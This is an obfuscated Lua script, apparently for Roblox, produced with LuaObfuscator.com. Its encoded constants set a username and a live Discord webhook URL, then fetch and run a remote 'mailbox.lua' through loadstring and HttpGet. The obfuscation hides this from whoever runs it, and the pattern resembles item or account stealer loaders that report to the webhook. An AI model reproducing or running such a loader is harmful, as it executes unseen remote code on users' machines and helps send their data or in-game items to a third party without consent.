--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((621 -(499 + 56 + 64))^(v32-((2 -0) -1))))%((5 -3)^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v70-(v70%(1 + 0)) ;else local v71=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v71 + v71))>=v71) and 1) or (1637 -(1523 + (1179 -(68 + 997)))) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -1) + 0 );v18=v18 + 1 + 3 ;return (v40 * ((16778523 -(87 + 263)) -(892 + (245 -(67 + 113))))) + (v39 * (156337 -90801)) + (v38 * (472 -216)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,20) * ((2 + 0)^32)) + v41 ;local v45=v20(v42,83 -62 ,(3781 -2798) -(802 + 150) );local v46=((v20(v42,(527 -(416 + 26)) -53 )==1) and  -(1 -0)) or ((3 -2) + 0) ;if (v45==0) then if (v44==(997 -(915 + 82))) then return v46 * (0 -0) ;else local v76=0 + 0 + (0 -0) ;while true do if (v76==(0 -(438 -(145 + 293)))) then v45=(1618 -(44 + 386)) -(1069 + 118) ;v43=(1486 -(998 + 488)) -0 ;break;end end end elseif (v45==(4477 -2430)) then return ((v44==(0 + 0)) and (v46 * ((1 -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1814 -(368 + 423)) ) * (v43 + (v44/((6 -(2 + 2))^((58 + 12) -(10 + 8))))) ;end local function v25(v47)local v48=772 -(201 + 571) ;local v49;local v50;while true do if (v48==3) then return v6(v50);end if (v48==(1138 -(7 + 109 + 1022))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -(0 + 0))) then return "";end end v48=1 + 0 ;end if (v48==(7 -5)) then v50={};for v77=3 -2 , #v49 do v50[v77]=v2(v1(v3(v49,v77,v77)));end v48=862 -((1699 -(261 + 624)) + 45) ;end if (v48==(2 -1)) then v49=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;v48=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v51~=2) then else v56=nil;v57=nil;v51=1 + 2 ;end if (v51~=(1172 -(418 + 753))) then else v54=nil;v55=nil;v51=1 + 1 ;end if (v51~=4) then else v60=nil;while true do if (v52~=(0 + 0)) then else local v96=0 + 0 ;while true do if (v96==1) then v52=1 + 0 ;break;end if (v96==(529 -(406 + 123))) then v53=1769 -(1749 + 20) ;v54=nil;v96=1;end end end if (v52==1) then local v97=0 + 0 ;while true do if (v97~=1) then else v52=1324 -(1249 + 73) ;break;end if (v97==0) then v55=nil;v56=nil;v97=1 + 0 ;end end end if (v52==(1147 -(466 + 679))) then local v98=0;while true do if (v98==1) then v52=6 -3 ;break;end if (v98==0) then v57=nil;v58=nil;v98=1;end end end if (v52==4) then while true do if (v53~=(0 -0)) then else local v103=1900 -(106 + 1794) ;while true do if (v103~=1) then else v53=1 + 0 ;break;end if (v103==(0 + 0)) then v54=0 -0 ;v55=nil;v103=1;end end end if (v53~=3) then else v60=nil;while true do local v106=0;local v107;while true do if (v106==(0 -0)) then v107=0;while true do if (v107==1) then if (v54~=0) then else local v158=114 -(4 + 110) ;while true do if (v158~=1) then else v57={};v54=585 -(57 + 527) ;break;end if (v158==(1427 -(41 + 1386))) then local v169=103 -(17 + 86) ;local v170;while true do if (v169~=(0 + 0)) then else v170=0 -0 ;while true do if (v170==1) then v158=1;break;end if (v170~=0) then else local v178=0 -0 ;while true do if (v178==(167 -(122 + 44))) then v170=1 -0 ;break;end if (v178~=(0 -0)) then else v55={};v56={};v178=1;end end end end break;end end end end end if (v54~=(3 + 0)) then else local v159=0;local v160;while true do if (v159==(0 + 0)) then v160=0;while true do if (v160==(0 -0)) then local v173=0;while true do if (v173~=0) then else local v179=65 -(30 + 35) ;while true do if (v179==0) then for v189=1,v23() do v56[v189-1 ]=v28();end return v58;end end end end end end break;end end end break;end if (0~=v107) then else if (v54~=(1 + 0)) then else local v161=1257 -(1043 + 214) ;local v162;local v163;while true do if (v161==(0 -0)) then v162=0;v163=nil;v161=1;end if (1~=v161) then else while true do if (v162~=(1212 -(323 + 889))) then else v163=0;while true do if (v163==0) then v58={v55,v56,nil,v57};v59=v23();v163=581 -(361 + 219) ;end if ((321 -(53 + 267))~=v163) then else v60={};v54=2;break;end end break;end end break;end end end if (v54==(1 + 1)) then local v164=413 -(15 + 398) ;local v165;while true do if (0~=v164) then else v165=0;while true do if (v165~=(982 -(18 + 964))) then else local v174=0;while true do if (v174==0) then local v180=0 -0 ;while true do if (v180==0) then for v191=1,v59 do local v192=0 + 0 ;local v193;local v194;local v195;local v196;while true do if (v192~=2) then else while true do if (v193~=0) then else v194=0 + 0 ;v195=nil;v193=1;end if (v193~=1) then else v196=nil;while true do if (v194~=(850 -(20 + 830))) then else local v203=0;local v204;while true do if (v203==(0 + 0)) then v204=126 -(116 + 10) ;while true do if (v204~=1) then else v194=1 + 0 ;break;end if (v204~=(738 -(542 + 196))) then else local v216=0;while true do if (v216==(1 -0)) then v204=1;break;end if (v216~=(0 + 0)) then else v195=v21();v196=nil;v216=1 + 0 ;end end end end break;end end end if (v194==1) then if (v195==(1 + 0)) then v196=v21()~=(0 -0) ;elseif (v195==2) then v196=v24();elseif (v195==3) then v196=v25();end v60[v191]=v196;break;end end break;end end break;end if (0==v192) then v193=0 -0 ;v194=nil;v192=1552 -(1126 + 425) ;end if (v192~=1) then else v195=nil;v196=nil;v192=2;end end end v58[3]=v21();v180=406 -(118 + 287) ;end if ((3 -2)~=v180) then else v174=1;break;end end end if (v174~=1) then else v165=1;break;end end end if (v165~=1) then else for v175=1122 -(118 + 1003) ,v23() do local v176=0;local v177;while true do if (0~=v176) then else v177=v21();if (v20(v177,1,2 -1 )~=(377 -(142 + 235))) then else local v182=0;local v183;local v184;local v185;local v186;local v187;local v188;while true do if (v182==1) then v185=nil;v186=nil;v182=9 -7 ;end if (v182~=(1 + 2)) then else while true do if (v183~=(979 -(553 + 424))) then else v188=nil;while true do if (v184==(1 -0)) then local v199=0 + 0 ;local v200;while true do if (v199~=0) then else v200=0 + 0 ;while true do if (v200~=(1 + 0)) then else v184=2;break;end if (v200==(0 + 0)) then v187=nil;v188=nil;v200=1 + 0 ;end end break;end end end if (0~=v184) then else local v201=0 -0 ;local v202;while true do if ((0 -0)~=v201) then else v202=0 -0 ;while true do if ((0 + 0)~=v202) then else local v215=0 -0 ;while true do if (v215~=0) then else v185=753 -(239 + 514) ;v186=nil;v215=1 + 0 ;end if (v215==(1330 -(797 + 532))) then v202=1 + 0 ;break;end end end if (v202~=1) then else v184=1 + 0 ;break;end end break;end end end if (v184==(4 -2)) then while true do if (v185==2) then local v206=0;local v207;while true do if (v206==0) then v207=0;while true do if (v207~=1) then else v185=3;break;end if (0~=v207) then else local v217=1202 -(373 + 829) ;while true do if (v217==1) then v207=1;break;end if (v217==(731 -(476 + 255))) then local v220=0;while true do if (v220==(1130 -(369 + 761))) then if (v20(v187,1 + 0 ,1 -0 )==(1 -0)) then v188[240 -(64 + 174) ]=v60[v188[1 + 1 ]];end if (v20(v187,2 -0 ,2)~=1) then else v188[3]=v60[v188[339 -(144 + 192) ]];end v220=1;end if (1==v220) then v217=217 -(42 + 174) ;break;end end end end end end break;end end end if (1==v185) then local v208=0;local v209;while true do if (v208~=0) then else v209=0;while true do if (v209~=(0 + 0)) then else local v218=0;while true do if (v218~=(1 + 0)) then else v209=1 + 0 ;break;end if (v218~=0) then else v188={v22(),v22(),nil,nil};if (v186==0) then local v221=0 -0 ;local v222;local v223;while true do if (v221==(0 + 0)) then v222=0;v223=nil;v221=1;end if (v221==(1 + 0)) then while true do if (v222~=(1975 -(1913 + 62))) then else v223=0;while true do if (v223==0) then v188[2 + 1 ]=v22();v188[10 -6 ]=v22();break;end end break;end end break;end end elseif (v186==1) then v188[1936 -(565 + 1368) ]=v23();elseif (v186==(7 -5)) then v188[1664 -(1477 + 184) ]=v23() -((2 -0)^16) ;elseif (v186~=(3 + 0)) then else local v230=856 -(564 + 292) ;while true do if (v230==(0 -0)) then v188[8 -5 ]=v23() -(2^(320 -(244 + 60))) ;v188[4]=v22();break;end end end v218=1;end end end if (1==v209) then v185=2 + 0 ;break;end end break;end end end if ((476 -(41 + 435))==v185) then local v210=1001 -(938 + 63) ;local v211;while true do if (v210==0) then v211=0;while true do if (v211==(1 + 0)) then v185=1;break;end if ((1125 -(936 + 189))~=v211) then else local v219=0;while true do if (v219~=(0 + 0)) then else v186=v20(v177,1615 -(1565 + 48) ,2 + 1 );v187=v20(v177,4,6);v219=1139 -(782 + 356) ;end if (v219~=(268 -(176 + 91))) then else v211=2 -1 ;break;end end end end break;end end end if (v185~=3) then else if (v20(v187,4 -1 ,3)~=(1093 -(975 + 117))) then else v188[1879 -(157 + 1718) ]=v60[v188[4 + 0 ]];end v55[v175]=v188;break;end end break;end end break;end if (v183~=0) then else local v197=0 -0 ;while true do if (v197==(0 -0)) then v184=1018 -(697 + 321) ;v185=nil;v197=2 -1 ;end if (v197~=(1 -0)) then else v183=1;break;end end end if (v183~=1) then else local v198=0;while true do if (1~=v198) then else v183=2;break;end if (v198~=(0 -0)) then else v186=nil;v187=nil;v198=1 + 0 ;end end end end break;end if (v182==2) then v187=nil;v188=nil;v182=3;end if (v182==(0 -0)) then v183=0;v184=nil;v182=1;end end end break;end end end v54=7 -4 ;break;end end break;end end end v107=1;end end break;end end end break;end if (v53~=(1229 -(322 + 905))) then else local v104=0;local v105;while true do if (v104~=0) then else v105=611 -(602 + 9) ;while true do if (v105~=0) then else local v130=0;while true do if (v130==(1189 -(449 + 740))) then v58=nil;v59=nil;v130=1;end if (v130~=1) then else v105=873 -(826 + 46) ;break;end end end if (v105~=1) then else v53=3;break;end end break;end end end if (v53==1) then v56=nil;v57=nil;v53=949 -(245 + 702) ;end end break;end if (v52==3) then v59=nil;v60=nil;v52=12 -8 ;end end break;end if (v51==3) then v58=nil;v59=nil;v51=4;end if ((0 + 0)~=v51) then else v52=0;v53=nil;v51=1899 -(260 + 1638) ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=8) then if (v92<=3) then if (v92<=1) then if (v92>0) then v89[v91[2]]();else local v108=0;local v109;local v110;while true do if (v108==1) then v89[v109 + 1 ]=v110;v89[v109]=v110[v91[4]];break;end if (v108==0) then v109=v91[2];v110=v89[v91[3]];v108=1;end end end elseif (v92>2) then v89[v91[2]]();else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=5) then if (v92>4) then v63[v91[3]]=v89[v91[2]];else local v114=v91[2];v89[v114]=v89[v114](v13(v89,v114 + 1 ,v84));end elseif (v92<=6) then v89[v91[2]]=v91[3];elseif (v92==7) then v89[v91[2]]=v91[3];else local v133=0;local v134;local v135;local v136;local v137;while true do if (v133==1) then v84=(v136 + v134) -1 ;v137=0;v133=2;end if (v133==2) then for v167=v134,v84 do local v168=0;while true do if (v168==0) then v137=v137 + 1 ;v89[v167]=v135[v137];break;end end end break;end if (v133==0) then v134=v91[2];v135,v136=v82(v89[v134](v13(v89,v134 + 1 ,v91[3])));v133=1;end end end elseif (v92<=12) then if (v92<=10) then if (v92==9) then local v118=v91[2];v89[v118]=v89[v118](v13(v89,v118 + 1 ,v84));elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end elseif (v92==11) then local v120=v91[2];local v121,v122=v82(v89[v120](v13(v89,v120 + 1 ,v91[3])));v84=(v122 + v120) -1 ;local v123=0;for v128=v120,v84 do local v129=0;while true do if (v129==0) then v123=v123 + 1 ;v89[v128]=v121[v123];break;end end end elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end elseif (v92<=14) then if (v92==13) then v89[v91[2]]=v91[3]~=0 ;else do return;end end elseif (v92<=15) then local v125=0;local v126;local v127;while true do if (v125==0) then v126=v91[2];v127=v89[v91[3]];v125=1;end if (v125==1) then v89[v126 + 1 ]=v127;v89[v126]=v127[v91[4]];break;end end elseif (v92==16) then v63[v91[3]]=v89[v91[2]];else do return;end end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D6503143O007369796168676979656E67656E637974362O333503073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31373534333638363931363536342O3937302F7730446972327470425965393234385F2O2D453076634B61446365472O696469376658616A642O44494D306472334B31725A476F3356356F4A5F5531716471415F685238030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O0012063O00023O0012103O00013O0012063O00043O0012103O00033O00120C3O00053O00120C000100063O00200F000100010007001206000300084O0002000400014O0008000100044O00095O00022O00013O000100012O000E3O00017O00",v9(),...);
